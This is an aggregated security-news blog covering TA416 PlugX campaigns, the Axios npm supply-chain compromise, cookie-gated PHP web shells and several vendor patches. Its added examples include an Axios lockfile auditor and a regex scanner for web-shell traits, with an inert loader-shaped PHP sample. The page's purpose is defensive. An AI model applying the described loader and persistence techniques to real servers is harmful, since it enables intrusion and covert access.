Posts on Security, Cloud, DevOps, Citrix, VMware and others.
Words and views are my own and do not reflect on my company's views.
A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region.
The campaign has been attributed to TA416, a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda.
"This TA416 activity included multiple waves of web bug and malware delivery campaigns against diplomatic missions to the European Union and NATO across a range of European countries," Proofpoint researchers Mark Kelly and Georgi Mladenov said.
"Throughout this period, TA416 regularly altered its infection chain, including abusing Cloudflare Turnstile challenge pages, abusing OAuth redirects, and using C# project files, as well as frequently updating its custom PlugX payload."
TA416 has also been observed orchestrating multiple campaigns aimed at diplomatic and government entities in the Middle East following the outbreak of the U.S.-Israel-Iran conflict in late February 2026. The effort is likely an attempt to gather regional intelligence pertaining to the conflict, the enterprise security company added.
It's worth mentioning here that TA416 also shares historical technical overlaps with another cluster known as Mustang Panda (aka CeranaKeeper, Red Ishtar, and UNK_SteadySplit). The two activity groups are collectively tracked under the monikers Earth Preta, Hive0154, HoneyMyte, Stately Taurus, Temp.HEX, and Twill Typhoon.
While TA416's attacks are characterized by the use of bespoke PlugX variants, the Mustang Panda cluster has repeatedly deployed tools like TONESHELL, PUBLOAD, and COOLCLIENT in recent attacks. What's common to both of them is the use of DLL side-loading to launch the malware.
TA416's renewed focus on European entities is driven by a mix of web bug and malware delivery campaigns, with the threat actors using freemail sender accounts to conduct reconnaissance and deploy the PlugX backdoor via malicious archives hosted on Microsoft Azure Blob Storage, Google Drive, domains under their control, and compromised SharePoint instances. The PlugX malware campaigns were previously documented by StrikeReady and Arctic Wolf in October 2025.
"A web bug (or tracking pixel) is a tiny invisible object embedded in an email that triggers an HTTP request to a remote server when opened, revealing the recipient's IP address, user agent, and time of access, allowing the threat actor to assess whether the email was opened by the intended target," Proofpoint said.
Attacks carried out by TA416 in December 2025 have been found to leverage third-party Microsoft Entra ID cloud applications to initiate redirects that lead to the download of malicious archives. Phishing emails used as part of this attack wave contain a link to Microsoft's legitimate OAuth authorization endpoint that, when clicked, redirects the user to the attacker-controlled domain and ultimately deploys PlugX.
The use of this technique has not escaped Microsoft's notice, which last month warned of phishing campaigns targeting government and public-sector organizations that employ OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers.
Further refinements to the attack chain were observed in February 2026, when TA416 began linking to archives hosted on Google Drive or a compromised SharePoint instance. The downloaded archives, in this case, include a legitimate Microsoft MSBuild executable and a malicious C# project file.
"When the MSBuild executable is run, it searches the current directory for a project file and automatically builds it," the researchers said. "In the observed TA416 activity, the CSPROJ file acts as a downloader, decoding three Base64-encoded URLs to fetch a DLL side-loading triad from a TA416-controlled domain, saving them to the user's temp directory, and executing a legitimate executable to load PlugX via the group's typical DLL side-loading chain."
The PlugX malware remains a consistent presence throughout TA416's intrusions, although the legitimate, signed executables abused for DLL side-loading have varied over time. The backdoor is also known to establish an encrypted communication channel with its command-and-control (C2) server, but not before performing anti-analysis checks to sidestep detection.
PlugX accepts five different commands -
0x00000002, to capture system information
0x00001005, to uninstall the malware
0x00001007, to adjust beaconing interval and timeout parameter
0x00003004, to download a new payload (EXE, DLL, or DAT) and execute it
0x00007002, to open a reverse command shell
"TA416's shift back to European government targeting in mid-2025, following two years of focus on Southeast Asia and Mongolia, is consistent with a renewed intelligence-collection focus against EU and NATO-affiliated diplomacy entities," Proofpoint said.
"In addition, TA416's expansion to Middle Eastern government targeting in March 2026 further highlights how the group’s tasking prioritization is likely influenced by geopolitical flashpoints and escalations. Throughout this period, the group has shown a willingness to iterate on infection chains, cycling through using fake Cloudflare Turnstile pages, OAuth redirect abuse, and MSBuild-based delivery, while continuing to update its customized PlugX backdoor."
The disclosure comes as Darktrace revealed that Chinese‑nexus cyber operations have evolved from strategically-aligned activity in the 2010s to highly adaptive, identity-centric intrusions with an intent to establish long-term persistence within critical infrastructure networks.
Based on a review of attack campaigns between July 2022 and September 2025, U.S.-based organizations accounted for 22.5% of all global events, followed by Italy, Spain, Germany, Thailand, the U.K., Panama, Colombia, the Philippines, and Hong Kong. A majority of cases (63%) involved the exploitation of internet-facing infrastructure (e.g., CVE-2025-31324 and CVE-2025-0994) to obtain initial access.
"In one notable case, the actor had fully compromised the environment and established persistence, only to resurface in the environment more than 600 days after," Darktrace said. "The operational pause underscores both the depth of the intrusion and the actor’s long‑term strategic intent."
from The Hacker News https://ift.tt/hbuOB1Z
via IFTTT
Cisco Talos is actively investigating the March 31, 2026 supply chain attack on the official Axios node package manager (npm) package during which two malicious versions (v1.14.1 and v0.30.4) were deployed. Axios is one of the more popular JavaScript libraries with as many as 100 million downloads per week.
Axios is a widely deployed HTTP client library for JavaScript that simplifies HTTP requests, specifically for REST endpoints. The malicious packages were only available for approximately three hours, but Talos strongly encourages that any deployment that downloaded them be rolled back to a previous known safe version (v1.14.0 or v0.30.3). Additionally, Talos strongly recommends users and administrators investigate any systems that downloaded the malicious package for follow-on payloads from actor-controlled infrastructure.
Details of supply chain attack
The primary modification of the packages introduced a fake runtime dependency (plain-crypto-js) that executes via post-install without any user interaction required. Upon execution, the dependency reaches out to actor-controlled infrastructure (142[.]11[.]206[.]73) with operating system information to deliver a platform-specific payload to Linux, macOS, or Windows.
On macOS, a binary, “com.apple.act.mond”, is downloaded and run using zsh. On Windows, a ps1 file is delivered, which copies the legitimate PowerShell executable to “%PROGRAM DATA%\wt.exe” and executes the downloaded ps1 file with hidden and execution policy bypass flags. On Linux, a Python backdoor is downloaded and executed. The payload is a remote access trojan (RAT) with typical associated capabilities allowing the actor to gather information and run additional payloads.
Impact
As with most supply chain attacks, the full impact will likely take some time to uncover. The threat actors exfiltrated credentials along with remote management capabilities. Therefore, Talos strongly recommends organizations treat any credentials present on their systems with the malicious package as compromised and begin the process of rotating them as quickly as possible. Actors are likely to try to weaponize access as quickly as possible to maximize financial gain.
Supply chain attacks tend to have unexpected downstream impacts, as these packages are widely used across a variety of applications, and the compromised credentials can be leveraged in follow-on attacks. For additional context, about 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.
Talos will continue to monitor any follow-on impacts from this supply chain attack in the days and weeks ahead, as well as any additional indicators that are uncovered as a result of our ongoing investigation.
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.
"Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality," the tech giant said.
The approach offers added stealth as it allows malicious code to stay dormant during normal application execution and activate the web shell logic only when specific cookie values are present. This behavior, Microsoft noted, extends to web requests, scheduled tasks, and trusted background workers.
The malicious activity takes advantage of the fact that cookie values are available at runtime through the $_COOKIE superglobal variable, allowing attacker-supplied inputs to be consumed without additional parsing. What's more, the technique is unlikely to raise any red flags as cookies blend into normal web traffic and reduce visibility.
The cookie-controlled execution model comes in different implementations -
A PHP loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute an encoded secondary payload.
A PHP script that segments structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it.
A PHP script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file upload.
In at least one case, threat actors have been found to obtain initial access to a victim's hosted Linux environment through valid credentials or the exploitation of a known security vulnerability to set up a cron job that invokes a shell routine periodically to execute an obfuscated PHP loader.
This "self-healing" architecture allows the PHP loader to be repeatedly recreated by the scheduled task even if it was removed as part of cleanup and remediation efforts, thereby creating a reliable and persistent remote code execution channel. Once the PHP loader is deployed, it remains inactive during normal traffic and springs into action upon receiving HTTP requests with specific cookie values.
"By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions," Microsoft added. "By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs."
A common aspect that ties together all the aforementioned implementations is the use of obfuscation to conceal sensitive functionality and cookie-based gating to initiate the malicious action, while leaving a minimal interactive footprint.
To counter the threat, Microsoft recommends enforcing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces; monitoring for unusual login activity; restricting the execution of shell interpreters; auditing cron jobs and scheduled tasks across web servers; checking for suspicious file creation in web directories; and limiting hosting control panels' shell capabilities.
"The consistent use of cookies as a control mechanism suggests reuse of established web shell tradecraft," Microsoft said. "By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls."
"Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code."
from The Hacker News https://ift.tt/Xl4Z0iJ
The Good | SentinelOne AI EDR Stops LiteLLM Supply Chain Attack in Real Time
This week, SentinelOne demonstrated how autonomous, AI-driven endpoint protection can detect and stop sophisticated supply chain attacks in real time, without human intervention. On the same day the attack was launched, Singularity Platform identified and blocked a trojanized version of LiteLLM, an increasingly popular proxy for LLM API calls, before it could execute across multiple customer environments. The compromise had occurred only hours earlier, yet the platform prevented execution instantly, without requiring analyst input, signatures, or manual triage.
Catching the Payload in the Act
The attack itself followed a multi-stage, fast-moving pattern designed to evade traditional detection and manual workflows. Originating from a compromised security tool, attackers obtained PyPI credentials to publish malicious LiteLLM versions that deployed a cross-platform payload. In one case, SentinelOne observed an AI coding assistant with unrestricted permissions unknowingly installing the infected package, highlighting a new and largely ungoverned attack surface.
Once triggered, the malware attempted to execute obfuscated Python code, deploy a data stealer, establish persistence, move laterally into Kubernetes clusters, and exfiltrate encrypted data. SentinelOne’s behavioral AI detected the malicious activity at runtime, specifically identifying suspicious execution patterns like base64-decoded payloads, and terminated the process chain in under 44 seconds while preserving full forensic visibility.
Critically, detection did not depend on knowing the compromised package. Instead, it relied on observing behavior across processes, allowing the platform to stop the attack regardless of how it entered the environment – whether via a developer, CI/CD pipeline, or autonomous agent.
This incident underscores a growing trend: AI-driven attacks are operating at speeds that outpace human response. Effective defense now requires autonomous, behavior-based systems capable of acting instantly, closing the gap between detection and compromise before damage can occur.
The Bad | Attackers Compromise Axios to Deliver Cross-Platform RAT via Compromised npm
A major supply chain attack hit the JavaScript HTTP client Axios after malicious versions of its npm package introduced a hidden dependency that deploys a cross-platform remote access trojan (RAT). Specifically, Axios versions 1.14.1 and 0.30.4 were found to include a rogue package called “plain-crypto-js@4.2.1,” inserted using stolen npm credentials that belonged to a core maintainer. This allowed attackers to bypass normal CI/CD safeguards and publish poisoned releases directly to npm.
The malicious dependency exists solely to execute a post-install script that downloads and runs platform-specific malware on macOS, Windows, and Linux systems. Once executed, the malware connects to a command and control (C2) server, retrieves a second-stage payload, and then deletes itself while restoring clean-looking package files to evade detection. Notably, no malicious code exists within Axios itself, making the attack harder to detect through traditional code review.
The operation was highly coordinated, with staged payloads prepared in advance and both affected Axios branches compromised within minutes. Each platform-specific variant – C++ for macOS, PowerShell for Windows, and Python for Linux – shares the same functionality, enabling system reconnaissance, command execution, and data exfiltration. While macOS and Linux variants lack persistence, the Windows version establishes ongoing access via registry modifications.
Researchers believe the attacker leveraged a long-lived npm access token to gain control of the maintainer account. There are also indications linking the malware to previously observed tooling associated with a North Korean threat group known as UNC1069.
Users are strongly advised to downgrade Axios immediately to versions 1.14.0 or 0.30.3, remove the malicious dependency, check for indicators of compromise, and rotate all credentials if exposure is suspected.
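To act on the rollback advice in the Talos and SentinelOne write-ups above, the following added example (not code from Talos, SentinelOne or the Axios project) audits a package-lock.json for the compromised Axios releases and the rogue dependency, including copies pulled in transitively. The sample lockfiles and the `report-sdk` package name are constructed for illustration, and treating any locked version of plain-crypto-js as suspect is an assumption.

```python
import json

# Versions and package name come from the advisories quoted on this page.
BAD_AXIOS = {"1.14.1": "1.14.0", "0.30.4": "0.30.3"}  # compromised -> safe rollback
ROGUE_DEP = "plain-crypto-js"  # assumption: any locked version is treated as suspect


def _walk_v1(deps, trail=""):
    """lockfileVersion 1: packages are nested under "dependencies"."""
    for name, meta in deps.items():
        where = f"{trail}node_modules/{name}"
        yield name, meta.get("version"), where, meta.get("requires", {})
        yield from _walk_v1(meta.get("dependencies", {}), where + "/")


def iter_locked(lock):
    """Yield (name, version, install path, declared deps) for every locked package."""
    if "packages" in lock:  # lockfileVersion 2 and 3: flat map keyed by install path
        for path, meta in lock["packages"].items():
            if path:  # "" is the root project itself
                name = meta.get("name") or path.rpartition("node_modules/")[2]
                yield name, meta.get("version"), path, meta.get("dependencies", {})
    else:
        yield from _walk_v1(lock.get("dependencies", {}))


def audit(lock_text):
    """Return a list of (install path, message) findings for one lockfile."""
    findings = []
    for name, version, where, declared in iter_locked(json.loads(lock_text)):
        if name == "axios" and version in BAD_AXIOS:
            findings.append((where, f"axios@{version} is a compromised release; "
                                    f"roll back to {BAD_AXIOS[version]}"))
        if name == ROGUE_DEP:
            findings.append((where, f"{ROGUE_DEP}@{version} is locked; remove it"))
        elif ROGUE_DEP in declared:
            findings.append((where, f"{name}@{version} declares {ROGUE_DEP}"))
    return findings


# Constructed sample: lockfileVersion 3 with a direct and a nested axios.
SAMPLE_V3 = """
{"name": "demo-app", "lockfileVersion": 3, "packages": {
  "": {"name": "demo-app", "dependencies": {"axios": "^1.14.0", "report-sdk": "^2.0.0"}},
  "node_modules/axios": {"version": "1.14.1",
                         "dependencies": {"plain-crypto-js": "^4.2.1"}},
  "node_modules/plain-crypto-js": {"version": "4.2.1", "hasInstallScript": true},
  "node_modules/report-sdk": {"version": "2.0.3", "dependencies": {"axios": "^0.30.0"}},
  "node_modules/report-sdk/node_modules/axios": {"version": "0.30.3"}
}}
"""

# Constructed sample: lockfileVersion 1 where only a transitive axios is affected.
SAMPLE_V1 = """
{"name": "legacy-app", "lockfileVersion": 1, "dependencies": {
  "report-sdk": {"version": "2.0.3", "requires": {"axios": "^0.30.0"},
    "dependencies": {
      "axios": {"version": "0.30.4", "requires": {"plain-crypto-js": "^4.2.1"}}}}
}}
"""

if __name__ == "__main__":
    for label, text in (("v3", SAMPLE_V3), ("v1", SAMPLE_V1)):
        for where, message in audit(text):
            print(f"[{label}] {where}: {message}")
```

The audit reads the lockfile rather than the installed tree because, as described above, the dropper restores clean-looking package files after it runs.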
The Ugly | High-Severity Chrome Zero-Day in Dawn Component Allows Remote Code Execution
Google has issued security updates for its Chrome browser to address 21 vulnerabilities, including a high-severity zero-day flaw, tracked as CVE-2026-5281, that is actively being exploited in the wild. The vulnerability stems from a use-after-free (UAF) bug in Dawn, an open-source implementation of the WebGPU standard used by Chromium. If successfully exploited, it allows attackers who have already compromised the browser’s renderer process to execute arbitrary code via a specially crafted HTML page.
While Google has confirmed active exploitation, it has withheld technical details and attribution to limit further abuse until more users apply the patch. This zero-day is the latest in a series of actively-exploited Chrome flaws addressed in 2026 so far, bringing the total to four for this year alone. Previous issues included vulnerabilities in Chrome’s CSS component, Skia graphics library, and V8 JavaScript engine.
The Dawn flaw could lead to browser crashes, memory corruption, or other erratic behavior, underscoring the risks posed by modern browser attack surfaces. To date, Google has released fixes in Chrome version 146.0.7680.177/178 for Windows and macOS, and 146.0.7680.177 for Linux, now available through the Stable Desktop channel.
To protect against the flaw, users can update Chrome immediately by navigating to the browser’s settings and relaunching after installation. Other Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are also expected to roll out patches and should be updated promptly. CISA has added the flaw to its KEV catalog and mandated that FCEB agencies apply the patch by April 15, 2026 to protect their networks from attack. This latest incident highlights the ongoing targeting of web browsers by threat actors and reinforces the importance of timely patching to mitigate exploitation risks.
The maintainer of the Axios npm package has confirmed that the supply chain compromise was the result of a highly-targeted social engineering campaign orchestrated by North Korean threat actors tracked as UNC1069.
Maintainer Jason Saayman said the attackers tailored their social engineering efforts "specifically to me" by first approaching him under the guise of the founder of a legitimate, well-known company.
"They had cloned the company's founders' likeness as well as the company itself," Saayman said in a post-mortem of the incident. "They then invited me to a real Slack workspace. This workspace was branded to the company's CI and named in a plausible manner. The Slack [workspace] was thought out very well; they had channels where they were sharing LinkedIn posts."
Subsequently, the threat actors are said to have scheduled a meeting with him on Microsoft Teams. Upon joining the fake call, he was presented with a fake error message that stated "something on my system was out of date." As soon as the update was triggered, the attack led to the deployment of a remote access trojan.
The access afforded by the Trojan enabled the attackers to steal the npm account credentials necessary to publish two trojanized versions of the Axios npm package (1.14.1 and 0.30.4) containing an implant named WAVESHAPER.V2.
"Everything was extremely well coordinated, looked legit, and was done in a professional manner," Saayman added.
The attack chain described by the project maintainer shares extensive overlaps with tradecraft associated with UNC1069 and BlueNoroff. Details of the campaign were extensively documented by Huntress and Kaspersky last year, with the latter tracking it under the moniker GhostCall.
"Historically, [...] these specific guys have gone after crypto founders, VCs, public people," security researcher Taylor Monahan said. "They social engineer them and take over their accounts and target the next round of people. This evolution to targeting [OSS maintainers] is a bit concerning in my opinion."
As preventive steps, Saayman has outlined several changes, including resetting all devices and credentials, setting up immutable releases, adopting OIDC flow for publishing, and updating GitHub Actions to adopt best practices.
The findings demonstrate how open-source project maintainers are increasingly becoming the target of sophisticated attacks, effectively allowing threat actors to target downstream users at scale by publishing poisoned versions of highly popular packages.
With Axios attracting nearly 100 million weekly downloads and being used heavily across the JavaScript ecosystem, the blast radius of such a supply chain attack can be massive as it propagates swiftly through direct and transitive dependencies.
"A package as widely used as Axios being compromised shows how difficult it is to reason about exposure in a modern JavaScript environment," Socket's Ahmad Nassri said. "It is a property of how dependency resolution in the ecosystem works today."
from The Hacker News https://ift.tt/7EmD4xy
The next major breach hitting your clients probably won't come from inside their walls. It'll come through a vendor they trust, a SaaS tool their finance team signed up for, or a subcontractor nobody in IT knows about. That's the new attack surface, and most organizations are underprepared for it.
For decades, cybersecurity strategy revolved around a defined perimeter. Firewalls, endpoint controls, and identity management systems were deployed to protect assets within a known boundary.
That boundary has dissolved.
Today, client data lives in third-party SaaS applications, flows through vendor APIs, and is processed by subcontractors that internal IT teams may not even know about. Security no longer stops at owned infrastructure. It extends across an interconnected ecosystem of external providers, and the accountability that comes with it extends there, too.
The 2025 Verizon Data Breach Investigations Report found that third parties are involved in 30% of breaches. IBM's 2025 Cost of a Data Breach Report puts the average remediation cost of a third-party breach at $4.91 million. Third-party exposure has become a core feature of modern business operations, not an edge case.
For proactive service providers, this shift creates a substantial opportunity. Organizations facing mounting third-party threats are looking for strategic partners who can own, streamline, and continuously manage the entire third-party risk lifecycle. Service providers who step into that role can introduce new service offerings, deliver higher-value consulting, and establish themselves as central to their clients' security and compliance programs.
From Checkbox to Core Risk Function
The traditional approach to vendor risk relied on annual questionnaires, spreadsheets, and the occasional follow-up email. It was never adequate, and it's especially costly now.
Regulatory frameworks like CMMC, NIS2, and DORA have raised the bar significantly. Compliance now requires demonstrable, ongoing oversight of third-party controls, not a point-in-time snapshot from twelve months ago. Boards are asking harder questions about vendor exposure. Cyber insurers are scrutinizing supply chain hygiene before writing policies. And clients who've watched competitors absorb the fallout from a vendor's breach understand that "it wasn't our system" doesn't limit their liability.
The market is responding accordingly. Global TPRM spending is projected to grow from $8.3 billion in 2024 to $18.7 billion by 2030. Organizations are treating vendor oversight as a governance function, on par with incident response or identity management, because the cost of ignoring it has become too high.
For service providers, that budget allocation is a clear signal. Clients are actively looking for partners who can own and manage vendor oversight as a defined, ongoing service.
Scaling TPRM Is Where Most Providers Get Stuck
Most MSPs and MSSPs recognize the opportunity. The hesitation comes down to delivery, and specifically to whether TPRM can be executed profitably at scale.
Traditional vendor review relies on fragmented workflows and manual analysis. Custom assessments must be sent, tracked, and interpreted, and risk must be tiered against each client's specific obligations. This work often falls to senior consultants, making it expensive and hard to delegate.
Multiplying this effort across a client portfolio with different vendor ecosystems, compliance needs, and risk tolerances can be unsustainable. This is why many providers offer TPRM as a one-off project instead of a recurring managed service.
But that's also where the opportunity lies. Cynomi's Securing the Modern Perimeter guide outlines how structured, technology-enabled TPRM can shift from a bespoke consulting engagement into a repeatable, high-margin service line that strengthens client retention, drives upsell, and positions service providers as integral partners in their clients' security programs.
Turning TPRM Into a Revenue Engine
Third-party risk is a conversation starter that never runs out of material.
Every new vendor a client onboards creates a potential risk discussion. Regulatory updates are natural reasons to revisit vendor programs, and every breach in the news that traces back to a third party reinforces the stakes. TPRM, done well, keeps service providers embedded in client strategy rather than relegated to reactive support, and that positioning changes the nature of the relationship entirely.
Providers who build out structured TPRM capabilities find that it opens doors to:
Broader security advisory work
Higher retainer values
Stronger client relationships built on genuine business impact
Differentiation in a crowded managed services market
Credible third-party risk governance, signaling maturity to prospective clients
The Bottom Line
Third-party risk isn't going away. The vendor ecosystems your clients depend on will keep growing more complex, with more SaaS platforms, AI-powered tools, subcontractors, and regulatory scrutiny layered on top. Organizations that manage this exposure well will have a meaningful advantage in resilience and compliance.
Building a structured, scalable TPRM practice that delivers consistent oversight across your portfolio creates far more leverage than adding headcount or assembling bespoke programs from scratch for every client. The infrastructure you build once pays dividends across every account.
Cynomi's Securing the Modern Perimeter: The Rise of Third-Party Risk Management is a practical starting point. It covers the full scope of modern third-party risk, what a governance-grade TPRM program looks like, and how service providers can build and scale this capability without sacrificing margins.
This article is a contributed piece from one of our valued partners.
from The Hacker News https://ift.tt/GsOS26u
Cisco has released updates to address a critical security flaw in the Integrated Management Controller (IMC) that, if successfully exploited, could allow an unauthenticated, remote attacker to bypass authentication and gain access to the system with elevated privileges.
The vulnerability, tracked as CVE-2026-20093, carries a CVSS score of 9.8 out of a maximum of 10.0.
"This vulnerability is due to incorrect handling of password change requests," Cisco said in an advisory released Wednesday. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device."
"A successful exploit could allow the attacker to bypass authentication, alter the passwords of any user on the system, including an Admin user, and gain access to the system as that user."
Security researcher "jyh" has been credited with discovering and reporting the vulnerability. The shortcoming affects the following products regardless of the device configuration -
5000 Series Enterprise Network Compute Systems (ENCS) - Fixed in 4.15.5
Catalyst 8300 Series Edge uCPE - Fixed in 4.18.3
UCS C-Series M5 and M6 Rack Servers in standalone mode - Fixed in 4.3(2.260007), 4.3(6.260017), and 6.0(1.250174)
UCS E-Series Servers M3 - Fixed in 3.2.17
UCS E-Series Servers M6 - Fixed in 4.15.3
Another critical vulnerability patched by Cisco impacts Smart Software Manager On-Prem (SSM On-Prem), which could enable an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system. The vulnerability, CVE-2026-20160 (CVSS score: 9.8), stems from an unintentional exposure of an internal service.
"An attacker could exploit this vulnerability by sending a crafted request to the API of the exposed service," Cisco said. "A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges."
Patches for the flaw have been released in Cisco SSM On-Prem version 9-202601. Cisco said the vulnerability was discovered internally during the resolution of a Cisco Technical Assistance Center (TAC) support case.
While neither of the vulnerabilities has been exploited in the wild, a number of recently disclosed security flaws in Cisco products have been weaponized by threat actors. In the absence of a workaround, customers are recommended to update to the fixed version for optimal protection.
from The Hacker News https://ift.tt/lUNnD7Z
Threat actors are increasingly abusing HTTP cookies as a control channel for PHP-based webshells on Linux servers. Instead of exposing command execution through URL parameters or request bodies, these webshells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality.
This approach reduces visibility by allowing malicious code to remain dormant during normal application behavior and execute only when specific cookie conditions are met. This technique has been observed across multiple execution contexts, including web requests, scheduled tasks, and trusted background workers.
The consistent use of cookies as a control mechanism suggests reuse of established webshell tradecraft. By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls.
Cookie-controlled execution behavior
Across the activity analyzed, HTTP cookies acted as the primary trigger for malicious execution. Instead of exposing functionality through visible URL parameters or request bodies, the webshell logic remained dormant unless specific cookie values were present. Only when those conditions were satisfied did the script reconstruct and execute threat actor–controlled behavior.
Threat actors likely prefer this approach because cookies blend into normal web traffic and often receive less scrutiny than request paths or payloads. In PHP, cookie values are immediately available at runtime, for example through the $_COOKIE superglobal, allowing malicious code to consume attacker-supplied input without additional parsing. By shifting execution control into cookies, the webshell can remain hidden in normal traffic, activating only during deliberate interactions. This reduces routine logging and inspection visibility while enabling persistent access without frequent changes to files on disk.
Observed variants of cookie-controlled PHP web shells
Although the core technique remained consistent across incidents, the PHP implementations varied in structure and complexity. The following examples illustrate how attackers adapted the same cookie-controlled execution model across different environments.
Loader with execution gating and layered obfuscation
One observed implementation introduced an additional execution gate before processing any cookie input. The loader first evaluated request context and reconstructed core PHP functions dynamically using arithmetic operations and string manipulation. Sensitive function names were intentionally absent in cleartext, significantly reducing obvious indicators and complicating pattern-based detection.
After the initial base64 decoding, the PHP script did not immediately reveal obvious command functionality. Instead, it exposed a second, deliberate layer of obfuscation. Critical operations were rebuilt programmatically at runtime, with function names and execution logic assembled character-by-character. This design ensured that meaningful behavior remained concealed until execution conditions were satisfied.
Only after these runtime checks passed did the script begin parsing structured cookie input. Cookie values were segmented and transformed into function identifiers, file paths, and decoding routines. If a secondary payload was not already present, the loader reconstructed it from encoded data, wrote it to a dynamically determined location, and transferred execution using ‘include’.
This layered approach separated deployment, obfuscation, and activation into distinct stages. Under routine traffic, the file appeared inert. When supplied with deliberate attacker-controlled input, however, it transitioned into a fully functional execution framework.
Direct cookie-driven payload stager
Another observed implementation relied on structured cookie data without extensive preliminary gating. The script segmented cookie input to reconstruct operational components such as file handling and decoding functions. As with the previous loader, it conditionally wrote a secondary payload to disk and executed it if absent.
Although simpler in structure, this variant achieved the same objective: staged deployment and execution controlled by cookie values rather than visible request parameters.
Cookie-gated interactive webshell
A streamlined variant was also observed in which a single cookie value acts as an execution key. When the expected cookie condition is met, the script enables threat actor–controlled actions, including direct execution of supplied input and, in some cases, file upload. Unlike staged loader chains, this implementation operates within a single script and does not rely on a separate secondary payload written to disk.
In this design, cookies primarily serve as a validation mechanism rather than a payload container.
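The traits described for the three variants (cookie input, base64 decoding, function names assembled character by character, variable function calls, and `include` of a computed path) can be combined into a static triage pass over PHP files. The following is an added example, not code from the report; the indicator set, the scoring thresholds, and the function names `triage` and `scan_tree` are assumptions, and the embedded PHP samples are constructed and inert.

```python
import os
import re

# Heuristic indicators, each tied to a behaviour described above.
# They are assumptions made for this example, not vendor signatures.
INDICATORS = {
    "cookie_input": re.compile(r"\$_COOKIE\b"),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    # Name assembled character by character: chr(..).chr(..).chr(..)
    "chr_chain": re.compile(r"(?:\bchr\s*\([^)]*\)\s*\.\s*){2,}chr\s*\(", re.I),
    # A variable used as a function: $f(...) or $a['k'](...)
    "variable_call": re.compile(r"\$\w+(?:\[[^\]]{0,40}\])*\s*\("),
    # include/require of a computed (non-literal) path
    "dynamic_include": re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$", re.I),
    # Cookie value split into segments before use
    "cookie_split": re.compile(
        r"\b(?:explode|str_split|preg_split)\s*\([^;]*\$_COOKIE", re.I),
}


def strip_comments(src):
    """Drop block comments and whole-line comments so they cannot match."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return "\n".join(line for line in src.splitlines()
                     if not line.lstrip().startswith(("//", "#")))


def triage(source):
    """Score one PHP source string.

    Cookie input is the gate: without it the file is out of scope for this
    check. One extra indicator means 'review', two or more 'suspicious'.
    """
    code = strip_comments(source)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(code))
    if "cookie_input" not in hits:
        verdict = "clean"
    else:
        extra = len(hits) - 1
        verdict = "suspicious" if extra >= 2 else "review" if extra == 1 else "clean"
    return {"verdict": verdict, "hits": hits}


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a web root and return (path, verdict, hits) for non-clean files."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = triage(fh.read())
            if result["verdict"] != "clean":
                results.append((path, result["verdict"], result["hits"]))
    return results


# Constructed samples. The last one only rebuilds the name "strlen" and
# calls it; it has the shape described above without any harmful behaviour.
BENIGN_THEME = r"""<?php
// Remember the visitor's theme
$theme = isset($_COOKIE['theme']) ? $_COOKIE['theme'] : 'light';
echo htmlspecialchars($theme);
"""

BENIGN_PREFS = r"""<?php
$prefs = json_decode(base64_decode($_COOKIE['prefs'] ?? ''), true);
echo $prefs['lang'] ?? 'en';
"""

LOADER_SHAPED = r"""<?php
$p = explode('.', $_COOKIE['c'] ?? '');
$f = chr(115).chr(116).chr(114).chr(108).chr(101).chr(110);
if (count($p) === 3) { echo $f(base64_decode($p[1])); }
"""

if __name__ == "__main__":
    for label, sample in (("theme", BENIGN_THEME), ("prefs", BENIGN_PREFS),
                          ("loader-shaped", LOADER_SHAPED)):
        print(label, triage(sample))
```

A "review" verdict is expected for ordinary applications that base64-decode a preference cookie, so results are a triage queue for manual inspection rather than a detection verdict.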
Observed attack flow: Persistence through scheduled tasks
During incident investigation, we analyzed a compromise in which the threat actor prioritized durable, low-noise persistence within a hosted Linux environment. After obtaining access to the victim’s hosting account, the threat actor used the platform’s legitimate management interface, such as a control panel workflow, to register a cron job. In environments that provide restricted shell access, for example via /usr/local/cpanel/bin/jailshell, authenticated users can execute commands within their account boundary, including registering or launching scheduled tasks. Because these actions follow normal administrative paths, they appear as routine account-level operations rather than overt system modifications.
In shared hosting scenarios, this level of access is typically equivalent to user-level control within the account’s isolated environment. While it does not indicate root-level compromise or control of the underlying server, it provides sufficient capability to modify web content, deploy PHP scripts, and schedule recurring execution through cron. These permissions are often enough to convert temporary access into persistent remote code execution within the hosted account.
